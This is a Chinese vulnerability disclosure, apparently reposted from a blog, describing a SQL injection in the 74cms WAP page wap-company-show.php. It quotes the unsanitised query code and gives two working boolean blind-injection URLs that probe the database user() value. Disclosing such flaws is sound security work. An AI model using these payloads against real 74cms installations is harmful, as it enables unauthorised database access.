74cms一处注入

文章目录

漏洞作者: SLAckEr

/wap/wap-company-show.php

 

传递进来一个id,看一下company_one

/include/fun_wap.php

虽然在wheresql这里做了过滤

$wheresql=” WHERE id=”.intval($id);

但是下面

$jobslist = $db->getall(“select * from “.table(‘jobs’).” where company_id=”.$id.” limit 5″);

却没有处理。

随便注册个号,访问一个发布了职位的企业,或者自己申请个企业的号,访问自己的主页

鼠标移到招聘职位的

地方,可以看到id

0815145842d45ab984ab0f4a02519e23f7c4fbdb

 

08151623ec7f69194104405fd979d5315ac89ba7

 

08151633e4bddad9409680161df21020b4cf726d

 

漏洞证明:

http://127.0.0.1/74cms1104/wap/wap-company-show.php?id=1 and ascii(substring((user()),1,1))=114 返回正常,说明user()的第一个字符的ascii为114

http://127.0.0.1/74cms1104/wap/wap-company-show.php?id=1 and ascii(substring((user()),1,1))=1141 返回错误

盲注吧。

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录